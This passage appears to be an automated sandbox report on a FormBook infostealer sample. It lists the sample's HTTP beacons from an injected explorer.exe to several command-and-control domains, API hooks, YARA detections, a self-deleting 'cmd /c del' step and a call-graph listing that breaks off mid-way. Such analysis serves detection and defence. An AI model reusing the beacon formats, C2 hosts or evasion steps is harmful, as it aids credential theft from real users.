                                                            location: https://laneflowlogistics.com/vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiD
                                                            vary: Accept-Encoding
                                                            server: DPS/2.0.0+sha-623bf47
                                                            x-version: 623bf47
                                                            x-siteid: us-east-1
                                                            set-cookie: dps_site_id=us-east-1; path=/
                                                            date: Mon, 18 Mar 2024 13:43:58 GMT
                                                            keep-alive: timeout=5
                                                            transfer-encoding: chunked
                                                            connection: close
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549715104.16.36.105801028C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Mar 18, 2024 14:44:20.094347954 CET170OUTGET /vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C2 HTTP/1.1
                                                            Host: www.familyofficesheet.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:44:20.196521997 CET411INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 18 Mar 2024 13:44:20 GMT
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 18 Mar 2024 14:44:20 GMT
                                                            Location: https://www.familyofficesheet.com/vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C2
                                                            Server: cloudflare
                                                            CF-RAY: 8665a825dbc79e08-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.54971635.214.118.179801028C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Mar 18, 2024 14:45:01.182528973 CET165OUTGET /vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C2 HTTP/1.1
                                                            Host: www.flavorfog.online
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:45:01.344521046 CET455INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Mon, 18 Mar 2024 13:45:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.flavorfog.online/vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C2
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.54971769.57.172.11801028C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Mar 18, 2024 14:45:21.823977947 CET177OUTGET /vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJA HTTP/1.1
                                                            Host: www.bharatcrimecontrol24news.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:45:22.885150909 CET446INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            x-redirect-by: WordPress
                                                            location: http://bharatcrimecontrol24news.com/vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJA
                                                            content-length: 0
                                                            date: Mon, 18 Mar 2024 13:45:22 GMT
                                                            server: LiteSpeed
                                                            vary: User-Agent


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.54971834.149.87.45801028C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Mar 18, 2024 14:45:42.018352032 CET171OUTGET /vr01/?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj/6/I&K0Dl=8pkho2W8C2 HTTP/1.1
                                                            Host: www.kirtirefrigeration.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:45:42.868627071 CET1139INHTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.kirtirefrigeration.com/vr01?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj%2F6%2FI&K0Dl=8pkho2W8C2
                                                            Strict-Transport-Security: max-age=3600
                                                            X-Wix-Request-Id: 1710769542.78026576194612418710
                                                            Age: 0
                                                            Cache-Control: no-cache
                                                            Server: Pepyaka
                                                            X-Content-Type-Options: nosniff
                                                            Accept-Ranges: bytes
                                                            Date: Mon, 18 Mar 2024 13:45:42 GMT
                                                            X-Served-By: cache-iad-kiad7000089-IAD
                                                            X-Cache: MISS
                                                            Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaluhXXsY0kzeXc/hv5jOc6IbB2VXGwidGekceXEyeUpsqtvp+HZf/hy20BGHFtztY7w==,2UNV7KOq4oGjA5+PKsX47CaOPCbndCqdyYrCBy15MBQfbJaKSXYQ/lskq2jK6SGP,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,HQzds2w9GT0wVisn3OaPNtSg+YR3SVhnKJMUEotfkl4=,updaSF0YDozocDRTgMoSRwdxHn63yrlJJYydkEHt/lRLN8IqMAxeDJvk+4e3rd1n8RfI5tGWhNnxpdVR9kbUxg==
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.54971972.14.185.43801028C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Mar 18, 2024 14:46:05.770153046 CET161OUTGET /vr01/?K0Dl=8pkho2W8C2&F8=nF7lN0R+GAMQz/Akw9zAFS8sK1vaMqXOBBmwCvkEKDYNrGKPEkcEeMds11lXmHU70D3D HTTP/1.1
                                                            Host: www.topdeals.biz
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:46:05.900471926 CET331INHTTP/1.1 404 Not Found
                                                            server: openresty/1.13.6.1
                                                            date: Mon, 18 Mar 2024 13:46:05 GMT
                                                            content-type: text/html
                                                            content-length: 175
                                                            connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.5497203.33.130.190801028C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Mar 18, 2024 14:46:45.274276018 CET167OUTGET /vr01/?K0Dl=8pkho2W8C2&F8=XJpxajiERfwYWZCBMKFPnJULtBnU/CqQJGR7CZrrgovMO9KS90T7etXRllYWrqB0ffTS HTTP/1.1
                                                            Host: www.accidentapp.online
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function NameHook TypeActive in Processes
                                                            PeekMessageAINLINEexplorer.exe
                                                            PeekMessageWINLINEexplorer.exe
                                                            GetMessageWINLINEexplorer.exe
                                                            GetMessageAINLINEexplorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: user32.dll
                                                            Function NameHook TypeNew Data
                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEC
                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEC
                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEC
                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEC

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:14:42:39
                                                            Start date:18/03/2024
                                                            Path:C:\Users\user\Desktop\i5NDVAFg42.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\i5NDVAFg42.exe
                                                            Imagebase:0xce0000
                                                            File size:185'856 bytes
                                                            MD5 hash:728B83244A275EF0E29CB00AA0C6692C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:14:42:40
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff674740000
                                                            File size:5'141'208 bytes
                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.4456590108.000000000E4EB000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:3
                                                            Start time:14:42:42
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\SysWOW64\autochk.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\SysWOW64\autochk.exe
                                                            Imagebase:0x910000
                                                            File size:863'232 bytes
                                                            MD5 hash:FC398299F54290D5F35C69E865FD7CC2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:14:42:42
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                            Imagebase:0xa90000
                                                            File size:29'184 bytes
                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:5
                                                            Start time:14:42:45
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\user\Desktop\i5NDVAFg42.exe"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:14:42:45
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:1.5%
                                                              Dynamic/Decrypted Code Coverage:2.9%
                                                              Signature Coverage:5.9%
                                                              Total number of Nodes:555
                                                              Total number of Limit Nodes:73
                                                              execution_graph 95194 17c2ad0 LdrInitializeThunk 95195 cff120 95198 cfb970 95195->95198 95199 cfb996 95198->95199 95206 ce9d40 95199->95206 95201 cfb9a2 95202 cfb9c3 95201->95202 95214 cec1c0 95201->95214 95204 cfb9b5 95250 cfa6b0 95204->95250 95253 ce9c90 95206->95253 95208 ce9d4d 95209 ce9d54 95208->95209 95265 ce9c30 95208->95265 95209->95201 95215 cec1e5 95214->95215 95679 ceb1c0 95215->95679 95217 cec23c 95683 ceae40 95217->95683 95219 cec262 95249 cec4b3 95219->95249 95692 cf43a0 95219->95692 95221 cec2a7 95221->95249 95695 ce8a60 95221->95695 95223 cec2eb 95223->95249 95702 cfa500 95223->95702 95227 cec341 95228 cec348 95227->95228 95715 cfa010 95227->95715 95229 cfbdc0 2 API calls 95228->95229 95231 cec355 95229->95231 95231->95204 95233 cec392 95234 cfbdc0 2 API calls 95233->95234 95235 cec399 95234->95235 95235->95204 95236 cec3a2 95237 cef4a0 3 API calls 95236->95237 95238 cec416 95237->95238 95238->95228 95239 cec421 95238->95239 95240 cfbdc0 2 API calls 95239->95240 95241 cec445 95240->95241 95720 cfa060 95241->95720 95244 cfa010 2 API calls 95245 cec480 95244->95245 95245->95249 95725 cf9e20 95245->95725 95248 cfa6b0 2 API calls 95248->95249 95249->95204 95251 cfa6cf ExitProcess 95250->95251 95252 cfaf60 LdrLoadDll 95250->95252 95252->95251 95285 cf8bc0 95253->95285 95257 ce9cac 95258 ce9cb6 95257->95258 95292 cfb2b0 95257->95292 95258->95208 95260 ce9cf3 95260->95258 95303 ce9ab0 95260->95303 95262 ce9d13 95309 ce9620 LdrLoadDll 95262->95309 95264 ce9d25 95264->95208 95266 ce9c40 95265->95266 95654 cfb5a0 95266->95654 95269 cfb5a0 LdrLoadDll 95270 ce9c5b 95269->95270 95271 cfb5a0 LdrLoadDll 95270->95271 95272 ce9c71 95271->95272 95273 cef180 95272->95273 95274 cef199 95273->95274 95662 ceb040 95274->95662 95276 cef1ac 95666 cfa1e0 95276->95666 95280 cef1d2 95283 cef1fd 95280->95283 95672 cfa260 95280->95672 95282 cfa490 2 API calls 95284 ce9d65 95282->95284 95283->95282 95284->95201 95286 cf8bcf 95285->95286 95310 cf4e50 95286->95310 95288 ce9ca3 95289 cf8a70 95288->95289 95316 cfa600 95289->95316 95293 cfb2c9 95292->95293 95323 cf4a50 95293->95323 95295 cfb2e1 95296 cfb2ea 95295->95296 95362 cfb0f0 95295->95362 95296->95260 95298 cfb2fe 95298->95296 95380 cf9f00 95298->95380 95306 ce9aca 95303->95306 95634 ce7ea0 95303->95634 95305 ce9ad1 95305->95262 95306->95305 95647 ce8160 LdrLoadDll LdrInitializeThunk 95306->95647 95308 ce9b76 95308->95262 95309->95264 95311 cf4e5e 95310->95311 95313 cf4e6a 95310->95313 95311->95313 95315 cf52d0 LdrLoadDll 95311->95315 95313->95288 95314 cf4fbc 95314->95288 95315->95314 95319 cfaf60 95316->95319 95318 cf8a85 95318->95257 95320 cfaf70 95319->95320 95322 cfaf92 95319->95322 95321 cf4e50 LdrLoadDll 95320->95321 95321->95322 95322->95318 95324 cf4d85 95323->95324 95334 cf4a64 95323->95334 95324->95295 95327 cf4b73 95448 cfa460 LdrLoadDll 95327->95448 95328 cf4b90 95391 cfa360 95328->95391 95331 cf4b7d 95331->95295 95332 cf4bb7 95333 cfbdc0 2 API calls 95332->95333 95335 cf4bc3 95333->95335 95334->95324 95388 cf9c50 95334->95388 95335->95331 95336 cf4d49 95335->95336 95337 cf4d5f 95335->95337 95342 cf4c52 95335->95342 95338 cfa490 2 API calls 95336->95338 95457 cf4790 LdrLoadDll NtReadFile NtClose 95337->95457 95339 cf4d50 95338->95339 95339->95295 95341 cf4d72 95341->95295 95343 cf4cb9 95342->95343 95345 cf4c61 95342->95345 95343->95336 95344 cf4ccc 95343->95344 95450 cfa2e0 95344->95450 95347 cf4c7a 95345->95347 95348 cf4c66 95345->95348 95351 cf4c7f 95347->95351 95352 cf4c97 95347->95352 95449 cf4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 95348->95449 95394 cf46f0 95351->95394 95352->95339 95406 cf4410 95352->95406 95354 cf4c70 95354->95295 95356 cf4c8d 95356->95295 95358 cf4d2c 95454 cfa490 95358->95454 95359 cf4caf 95359->95295 95361 cf4d38 95361->95295 95363 cfb101 95362->95363 95364 cfb113 95363->95364 95475 cfbd40 95363->95475 95364->95298 95366 cfb134 95478 cf4070 95366->95478 95368 cfb180 95368->95298 95369 cfb157 95369->95368 95370 cf4070 3 API calls 95369->95370 95371 cfb179 95370->95371 95371->95368 95510 cf5390 95371->95510 95373 cfb20a 95374 cfb21a 95373->95374 95604 cfaf00 LdrLoadDll 95373->95604 95520 cfad70 95374->95520 95377 cfb248 95599 cf9ec0 95377->95599 95381 cf9f1c 95380->95381 95382 cfaf60 LdrLoadDll 95380->95382 95628 17c2c0a 95381->95628 95382->95381 95383 cf9f37 95385 cfbdc0 95383->95385 95631 cfa670 95385->95631 95387 cfb359 95387->95260 95389 cfaf60 LdrLoadDll 95388->95389 95390 cf4b44 95388->95390 95389->95390 95390->95327 95390->95328 95390->95331 95392 cfa37c NtCreateFile 95391->95392 95393 cfaf60 LdrLoadDll 95391->95393 95392->95332 95393->95392 95395 cf470c 95394->95395 95396 cfa2e0 LdrLoadDll 95395->95396 95397 cf472d 95396->95397 95398 cf4748 95397->95398 95399 cf4734 95397->95399 95401 cfa490 2 API calls 95398->95401 95400 cfa490 2 API calls 95399->95400 95402 cf473d 95400->95402 95403 cf4751 95401->95403 95402->95356 95458 cfbfd0 LdrLoadDll RtlAllocateHeap 95403->95458 95405 cf475c 95405->95356 95407 cf448e 95406->95407 95408 cf445b 95406->95408 95410 